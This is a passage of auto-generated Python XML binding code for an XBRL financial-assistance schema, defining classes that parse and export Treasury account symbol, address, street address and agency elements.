def export(self, outfile, level, namespace_='finassist:', name_='signOfAmountItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='signOfAmountItemType')
if self.hasContent_():
outfile.write('>')
outfile.write(str(self.valueOf_).encode(ExternalEncoding))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='signOfAmountItemType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='signOfAmountItemType'):
super(signOfAmountItemType, self).exportAttributes(outfile, level, already_processed, namespace_, name_='signOfAmountItemType')
def exportChildren(self, outfile, level, namespace_='finassist:', name_='signOfAmountItemType', fromsubclass_=False, pretty_print=True):
super(signOfAmountItemType, self).exportChildren(outfile, level, namespace_, name_, True, pretty_print=pretty_print)
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
super(signOfAmountItemType, self).buildAttributes(node, attrs, already_processed)
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class signOfAmountItemType
class sourceJournalIDItemType(tokenItemType):
subclass = None
superclass = tokenItemType
def __init__(self, id=None, contextRef=None, valueOf_=None):
self.original_tagname_ = None
super(sourceJournalIDItemType, self).__init__(id, contextRef, valueOf_, )
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if sourceJournalIDItemType.subclass:
return sourceJournalIDItemType.subclass(*args_, **kwargs_)
else:
return sourceJournalIDItemType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
self.valueOf_ or
super(sourceJournalIDItemType, self).hasContent_()
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='sourceJournalIDItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='sourceJournalIDItemType')
if self.hasContent_():
outfile.write('>')
outfile.write(str(self.valueOf_).encode(ExternalEncoding))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='sourceJournalIDItemType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='sourceJournalIDItemType'):
super(sourceJournalIDItemType, self).exportAttributes(outfile, level, already_processed, namespace_, name_='sourceJournalIDItemType')
def exportChildren(self, outfile, level, namespace_='finassist:', name_='sourceJournalIDItemType', fromsubclass_=False, pretty_print=True):
super(sourceJournalIDItemType, self).exportChildren(outfile, level, namespace_, name_, True, pretty_print=pretty_print)
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
super(sourceJournalIDItemType, self).buildAttributes(node, attrs, already_processed)
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class sourceJournalIDItemType
class xbrlIncludeItemType(tokenItemType):
subclass = None
superclass = tokenItemType
def __init__(self, id=None, contextRef=None, valueOf_=None):
self.original_tagname_ = None
super(xbrlIncludeItemType, self).__init__(id, contextRef, valueOf_, )
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if xbrlIncludeItemType.subclass:
return xbrlIncludeItemType.subclass(*args_, **kwargs_)
else:
return xbrlIncludeItemType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
self.valueOf_ or
super(xbrlIncludeItemType, self).hasContent_()
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='xbrlIncludeItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='xbrlIncludeItemType')
if self.hasContent_():
outfile.write('>')
outfile.write(str(self.valueOf_).encode(ExternalEncoding))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='xbrlIncludeItemType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='xbrlIncludeItemType'):
super(xbrlIncludeItemType, self).exportAttributes(outfile, level, already_processed, namespace_, name_='xbrlIncludeItemType')
def exportChildren(self, outfile, level, namespace_='finassist:', name_='xbrlIncludeItemType', fromsubclass_=False, pretty_print=True):
super(xbrlIncludeItemType, self).exportChildren(outfile, level, namespace_, name_, True, pretty_print=pretty_print)
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
super(xbrlIncludeItemType, self).buildAttributes(node, attrs, already_processed)
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class xbrlIncludeItemType
class phoneNumberDescriptionItemType(tokenItemType):
subclass = None
superclass = tokenItemType
def __init__(self, id=None, contextRef=None, valueOf_=None):
self.original_tagname_ = None
super(phoneNumberDescriptionItemType, self).__init__(id, contextRef, valueOf_, )
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if phoneNumberDescriptionItemType.subclass:
return phoneNumberDescriptionItemType.subclass(*args_, **kwargs_)
else:
return phoneNumberDescriptionItemType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
self.valueOf_ or
super(phoneNumberDescriptionItemType, self).hasContent_()
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='phoneNumberDescriptionItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='phoneNumberDescriptionItemType')
if self.hasContent_():
outfile.write('>')
outfile.write(str(self.valueOf_).encode(ExternalEncoding))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='phoneNumberDescriptionItemType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='phoneNumberDescriptionItemType'):
super(phoneNumberDescriptionItemType, self).exportAttributes(outfile, level, already_processed, namespace_, name_='phoneNumberDescriptionItemType')
def exportChildren(self, outfile, level, namespace_='finassist:', name_='phoneNumberDescriptionItemType', fromsubclass_=False, pretty_print=True):
super(phoneNumberDescriptionItemType, self).exportChildren(outfile, level, namespace_, name_, True, pretty_print=pretty_print)
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
super(phoneNumberDescriptionItemType, self).buildAttributes(node, attrs, already_processed)
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class phoneNumberDescriptionItemType
class availableTypeCodeItemType(tokenItemType):
subclass = None
superclass = tokenItemType
def __init__(self, id=None, contextRef=None, valueOf_=None):
self.original_tagname_ = None
super(availableTypeCodeItemType, self).__init__(id, contextRef, valueOf_, )
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if availableTypeCodeItemType.subclass:
return availableTypeCodeItemType.subclass(*args_, **kwargs_)
else:
return availableTypeCodeItemType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
self.valueOf_ or
super(availableTypeCodeItemType, self).hasContent_()
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='availableTypeCodeItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='availableTypeCodeItemType')
if self.hasContent_():
outfile.write('>')
outfile.write(str(self.valueOf_).encode(ExternalEncoding))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='availableTypeCodeItemType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='availableTypeCodeItemType'):
super(availableTypeCodeItemType, self).exportAttributes(outfile, level, already_processed, namespace_, name_='availableTypeCodeItemType')
def exportChildren(self, outfile, level, namespace_='finassist:', name_='availableTypeCodeItemType', fromsubclass_=False, pretty_print=True):
super(availableTypeCodeItemType, self).exportChildren(outfile, level, namespace_, name_, True, pretty_print=pretty_print)
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
super(availableTypeCodeItemType, self).buildAttributes(node, attrs, already_processed)
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class availableTypeCodeItemType
class TreasuryAccountSymbolComplexType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, id=None, agency=None, allocationTransferAgencyIdentifier=None, mainAccountNumber=None, subAccountSymbol=None, beginningPeriodOfAvailability=None, endingPeriodOfAvailability=None, availabilityTypeCode=None):
self.original_tagname_ = None
self.id = _cast(None, id)
self.agency = agency
if allocationTransferAgencyIdentifier is None:
self.allocationTransferAgencyIdentifier = []
else:
self.allocationTransferAgencyIdentifier = allocationTransferAgencyIdentifier
self.mainAccountNumber = mainAccountNumber
if subAccountSymbol is None:
self.subAccountSymbol = []
else:
self.subAccountSymbol = subAccountSymbol
if beginningPeriodOfAvailability is None:
self.beginningPeriodOfAvailability = []
else:
self.beginningPeriodOfAvailability = beginningPeriodOfAvailability
if endingPeriodOfAvailability is None:
self.endingPeriodOfAvailability = []
else:
self.endingPeriodOfAvailability = endingPeriodOfAvailability
self.availabilityTypeCode = availabilityTypeCode
def factory(*args_, **kwargs_):
if TreasuryAccountSymbolComplexType.subclass:
return TreasuryAccountSymbolComplexType.subclass(*args_, **kwargs_)
else:
return TreasuryAccountSymbolComplexType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_agency(self): return self.agency
def set_agency(self, agency): self.agency = agency
def get_allocationTransferAgencyIdentifier(self): return self.allocationTransferAgencyIdentifier
def set_allocationTransferAgencyIdentifier(self, allocationTransferAgencyIdentifier): self.allocationTransferAgencyIdentifier = allocationTransferAgencyIdentifier
def add_allocationTransferAgencyIdentifier(self, value): self.allocationTransferAgencyIdentifier.append(value)
def insert_allocationTransferAgencyIdentifier_at(self, index, value): self.allocationTransferAgencyIdentifier.insert(index, value)
def replace_allocationTransferAgencyIdentifier_at(self, index, value): self.allocationTransferAgencyIdentifier[index] = value
def get_mainAccountNumber(self): return self.mainAccountNumber
def set_mainAccountNumber(self, mainAccountNumber): self.mainAccountNumber = mainAccountNumber
def get_subAccountSymbol(self): return self.subAccountSymbol
def set_subAccountSymbol(self, subAccountSymbol): self.subAccountSymbol = subAccountSymbol
def add_subAccountSymbol(self, value): self.subAccountSymbol.append(value)
def insert_subAccountSymbol_at(self, index, value): self.subAccountSymbol.insert(index, value)
def replace_subAccountSymbol_at(self, index, value): self.subAccountSymbol[index] = value
def get_beginningPeriodOfAvailability(self): return self.beginningPeriodOfAvailability
def set_beginningPeriodOfAvailability(self, beginningPeriodOfAvailability): self.beginningPeriodOfAvailability = beginningPeriodOfAvailability
def add_beginningPeriodOfAvailability(self, value): self.beginningPeriodOfAvailability.append(value)
def insert_beginningPeriodOfAvailability_at(self, index, value): self.beginningPeriodOfAvailability.insert(index, value)
def replace_beginningPeriodOfAvailability_at(self, index, value): self.beginningPeriodOfAvailability[index] = value
def get_endingPeriodOfAvailability(self): return self.endingPeriodOfAvailability
def set_endingPeriodOfAvailability(self, endingPeriodOfAvailability): self.endingPeriodOfAvailability = endingPeriodOfAvailability
def add_endingPeriodOfAvailability(self, value): self.endingPeriodOfAvailability.append(value)
def insert_endingPeriodOfAvailability_at(self, index, value): self.endingPeriodOfAvailability.insert(index, value)
def replace_endingPeriodOfAvailability_at(self, index, value): self.endingPeriodOfAvailability[index] = value
def get_availabilityTypeCode(self): return self.availabilityTypeCode
def set_availabilityTypeCode(self, availabilityTypeCode): self.availabilityTypeCode = availabilityTypeCode
def get_id(self): return self.id
def set_id(self, id): self.id = id
def hasContent_(self):
if (
self.agency is not None or
self.allocationTransferAgencyIdentifier or
self.mainAccountNumber is not None or
self.subAccountSymbol or
self.beginningPeriodOfAvailability or
self.endingPeriodOfAvailability or
self.availabilityTypeCode is not None
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='TreasuryAccountSymbolComplexType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25" xmlns:gen="http://www.xbrl.org/int/gl/gen/2006-10-25" ', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='TreasuryAccountSymbolComplexType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='TreasuryAccountSymbolComplexType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='TreasuryAccountSymbolComplexType'):
if self.id is not None and 'id' not in already_processed:
already_processed.add('id')
outfile.write(' id=%s' % (quote_attrib(self.id), ))
def exportChildren(self, outfile, level, namespace_='finassist:', name_='TreasuryAccountSymbolComplexType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.agency is not None:
self.agency.export(outfile, level, namespace_='gen:', name_='agency', pretty_print=pretty_print)
for allocationTransferAgencyIdentifier_ in self.allocationTransferAgencyIdentifier:
allocationTransferAgencyIdentifier_.export(outfile, level, namespace_='gen:', name_='allocationTransferAgencyIdentifier', pretty_print=pretty_print)
if self.mainAccountNumber is not None:
self.mainAccountNumber.export(outfile, level, namespace_='gen:', name_='mainAccountNumber', pretty_print=pretty_print)
for subAccountSymbol_ in self.subAccountSymbol:
subAccountSymbol_.export(outfile, level, namespace_='gen:', name_='subAccountSymbol', pretty_print=pretty_print)
for beginningPeriodOfAvailability_ in self.beginningPeriodOfAvailability:
beginningPeriodOfAvailability_.export(outfile, level, namespace_='gen:', name_='beginningPeriodOfAvailability', pretty_print=pretty_print)
for endingPeriodOfAvailability_ in self.endingPeriodOfAvailability:
endingPeriodOfAvailability_.export(outfile, level, namespace_='gen:', name_='endingPeriodOfAvailability', pretty_print=pretty_print)
if self.availabilityTypeCode is not None:
self.availabilityTypeCode.export(outfile, level, namespace_='gen:', name_='availabilityTypeCode', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('id', node)
if value is not None and 'id' not in already_processed:
already_processed.add('id')
self.id = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'agency':
obj_ = agencyComplexType.factory()
obj_.build(child_)
self.agency = obj_
obj_.original_tagname_ = 'agency'
elif nodeName_ == 'allocationTransferAgencyIdentifier':
obj_ = integerItemType.factory()
obj_.build(child_)
self.allocationTransferAgencyIdentifier.append(obj_)
obj_.original_tagname_ = 'allocationTransferAgencyIdentifier'
elif nodeName_ == 'mainAccountNumber':
obj_ = integerItemType.factory()
obj_.build(child_)
self.mainAccountNumber = obj_
obj_.original_tagname_ = 'mainAccountNumber'
elif nodeName_ == 'subAccountSymbol':
obj_ = integerItemType.factory()
obj_.build(child_)
self.subAccountSymbol.append(obj_)
obj_.original_tagname_ = 'subAccountSymbol'
elif nodeName_ == 'beginningPeriodOfAvailability':
obj_ = stringItemType.factory()
obj_.build(child_)
self.beginningPeriodOfAvailability.append(obj_)
obj_.original_tagname_ = 'beginningPeriodOfAvailability'
elif nodeName_ == 'endingPeriodOfAvailability':
obj_ = stringItemType.factory()
obj_.build(child_)
self.endingPeriodOfAvailability.append(obj_)
obj_.original_tagname_ = 'endingPeriodOfAvailability'
elif nodeName_ == 'availabilityTypeCode':
obj_ = availableTypeCodeItemType.factory()
obj_.build(child_)
self.availabilityTypeCode = obj_
obj_.original_tagname_ = 'availabilityTypeCode'
# end class TreasuryAccountSymbolComplexType
class addressComplexType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, id=None, streetAddress=None, city=None, county=None, state=None, postalCode=None, zipCodePlus4=None, countryName=None, countryCode=None, congressionalDistrict=None):
self.original_tagname_ = None
self.id = _cast(None, id)
self.streetAddress = streetAddress
self.city = city
self.county = county
self.state = state
self.postalCode = postalCode
self.zipCodePlus4 = zipCodePlus4
self.countryName = countryName
self.countryCode = countryCode
self.congressionalDistrict = congressionalDistrict
def factory(*args_, **kwargs_):
if addressComplexType.subclass:
return addressComplexType.subclass(*args_, **kwargs_)
else:
return addressComplexType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_streetAddress(self): return self.streetAddress
def set_streetAddress(self, streetAddress): self.streetAddress = streetAddress
def get_city(self): return self.city
def set_city(self, city): self.city = city
def get_county(self): return self.county
def set_county(self, county): self.county = county
def get_state(self): return self.state
def set_state(self, state): self.state = state
def get_postalCode(self): return self.postalCode
def set_postalCode(self, postalCode): self.postalCode = postalCode
def get_zipCodePlus4(self): return self.zipCodePlus4
def set_zipCodePlus4(self, zipCodePlus4): self.zipCodePlus4 = zipCodePlus4
def get_countryName(self): return self.countryName
def set_countryName(self, countryName): self.countryName = countryName
def get_countryCode(self): return self.countryCode
def set_countryCode(self, countryCode): self.countryCode = countryCode
def get_congressionalDistrict(self): return self.congressionalDistrict
def set_congressionalDistrict(self, congressionalDistrict): self.congressionalDistrict = congressionalDistrict
def get_id(self): return self.id
def set_id(self, id): self.id = id
def hasContent_(self):
if (
self.streetAddress is not None or
self.city is not None or
self.county is not None or
self.state is not None or
self.postalCode is not None or
self.zipCodePlus4 is not None or
self.countryName is not None or
self.countryCode is not None or
self.congressionalDistrict is not None
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='addressComplexType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25" xmlns:gen="http://www.xbrl.org/int/gl/gen/2006-10-25" ', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='addressComplexType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='addressComplexType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='addressComplexType'):
if self.id is not None and 'id' not in already_processed:
already_processed.add('id')
outfile.write(' id=%s' % (quote_attrib(self.id), ))
def exportChildren(self, outfile, level, namespace_='finassist:', name_='addressComplexType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.streetAddress is not None:
self.streetAddress.export(outfile, level, namespace_='gen:', name_='streetAddress', pretty_print=pretty_print)
if self.city is not None:
self.city.export(outfile, level, namespace_='gen:', name_='city', pretty_print=pretty_print)
if self.county is not None:
self.county.export(outfile, level, namespace_='gen:', name_='county', pretty_print=pretty_print)
if self.state is not None:
self.state.export(outfile, level, namespace_='gen:', name_='state', pretty_print=pretty_print)
if self.postalCode is not None:
self.postalCode.export(outfile, level, namespace_='gen:', name_='postalCode', pretty_print=pretty_print)
if self.zipCodePlus4 is not None:
self.zipCodePlus4.export(outfile, level, namespace_='gen:', name_='zipCodePlus4', pretty_print=pretty_print)
if self.countryName is not None:
self.countryName.export(outfile, level, namespace_='gen:', name_='countryName', pretty_print=pretty_print)
if self.countryCode is not None:
self.countryCode.export(outfile, level, namespace_='gen:', name_='countryCode', pretty_print=pretty_print)
if self.congressionalDistrict is not None:
self.congressionalDistrict.export(outfile, level, namespace_='gen:', name_='congressionalDistrict', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('id', node)
if value is not None and 'id' not in already_processed:
already_processed.add('id')
self.id = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'streetAddress':
obj_ = streetAddressComplexType.factory()
obj_.build(child_)
self.streetAddress = obj_
obj_.original_tagname_ = 'streetAddress'
elif nodeName_ == 'city':
obj_ = stringItemType.factory()
obj_.build(child_)
self.city = obj_
obj_.original_tagname_ = 'city'
elif nodeName_ == 'county':
obj_ = stringItemType.factory()
obj_.build(child_)
self.county = obj_
obj_.original_tagname_ = 'county'
elif nodeName_ == 'state':
obj_ = stateItemType.factory()
obj_.build(child_)
self.state = obj_
obj_.original_tagname_ = 'state'
elif nodeName_ == 'postalCode':
obj_ = stringItemType.factory()
obj_.build(child_)
self.postalCode = obj_
obj_.original_tagname_ = 'postalCode'
elif nodeName_ == 'zipCodePlus4':
obj_ = stringItemType.factory()
obj_.build(child_)
self.zipCodePlus4 = obj_
obj_.original_tagname_ = 'zipCodePlus4'
elif nodeName_ == 'countryName':
obj_ = stringItemType.factory()
obj_.build(child_)
self.countryName = obj_
obj_.original_tagname_ = 'countryName'
elif nodeName_ == 'countryCode':
obj_ = stringItemType.factory()
obj_.build(child_)
self.countryCode = obj_
obj_.original_tagname_ = 'countryCode'
elif nodeName_ == 'congressionalDistrict':
obj_ = congressionalDistrictItemType.factory()
obj_.build(child_)
self.congressionalDistrict = obj_
obj_.original_tagname_ = 'congressionalDistrict'
# end class addressComplexType
class streetAddressComplexType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, id=None, streetAddressLine=None):
self.original_tagname_ = None
self.id = _cast(None, id)
if streetAddressLine is None:
self.streetAddressLine = []
else:
self.streetAddressLine = streetAddressLine
def factory(*args_, **kwargs_):
if streetAddressComplexType.subclass:
return streetAddressComplexType.subclass(*args_, **kwargs_)
else:
return streetAddressComplexType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_streetAddressLine(self): return self.streetAddressLine
def set_streetAddressLine(self, streetAddressLine): self.streetAddressLine = streetAddressLine
def add_streetAddressLine(self, value): self.streetAddressLine.append(value)
def insert_streetAddressLine_at(self, index, value): self.streetAddressLine.insert(index, value)
def replace_streetAddressLine_at(self, index, value): self.streetAddressLine[index] = value
def get_id(self): return self.id
def set_id(self, id): self.id = id
def hasContent_(self):
if (
self.streetAddressLine
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='streetAddressComplexType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25" xmlns:gen="http://www.xbrl.org/int/gl/gen/2006-10-25" ', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='streetAddressComplexType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='streetAddressComplexType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='streetAddressComplexType'):
if self.id is not None and 'id' not in already_processed:
already_processed.add('id')
outfile.write(' id=%s' % (quote_attrib(self.id), ))
def exportChildren(self, outfile, level, namespace_='finassist:', name_='streetAddressComplexType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
for streetAddressLine_ in self.streetAddressLine:
streetAddressLine_.export(outfile, level, namespace_='gen:', name_='streetAddressLine', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('id', node)
if value is not None and 'id' not in already_processed:
already_processed.add('id')
self.id = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'streetAddressLine':
obj_ = stringItemType.factory()
obj_.build(child_)
self.streetAddressLine.append(obj_)
obj_.original_tagname_ = 'streetAddressLine'
# end class streetAddressComplexType
class agencyComplexType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, id=None, agencyIdentifier=None, agencyName=None, agencyOffice=None):
self.original_tagname_ = None
self.id = _cast(None, id)
self.agencyIdentifier = agencyIdentifier
self.agencyName = agencyName
if agencyOffice is None:
self.agencyOffice = []
else:
self.agencyOffice = agencyOffice
def factory(*args_, **kwargs_):
if agencyComplexType.subclass:
return agencyComplexType.subclass(*args_, **kwargs_)
else:
return agencyComplexType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_agencyIdentifier(self): return self.agencyIdentifier
def set_agencyIdentifier(self, agencyIdentifier): self.agencyIdentifier = agencyIdentifier
def get_agencyName(self): return self.agencyName
def set_agencyName(self, agencyName): self.agencyName = agencyName
def get_agencyOffice(self): return self.agencyOffice
def set_agencyOffice(self, agencyOffice): self.agencyOffice = agencyOffice
def add_agencyOffice(self, value): self.agencyOffice.append(value)
def insert_agencyOffice_at(self, index, value): self.agencyOffice.insert(index, value)
def replace_agencyOffice_at(self, index, value): self.agencyOffice[index] = value
def get_id(self): return self.id
def set_id(self, id): self.id = id
def hasContent_(self):
if (
self.agencyIdentifier is not None or
self.agencyName is not None or
self.agencyOffice
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='agencyComplexType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25" xmlns:gen="http://www.xbrl.org/int/gl/gen/2006-10-25" ', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='agencyComplexType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='agencyComplexType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
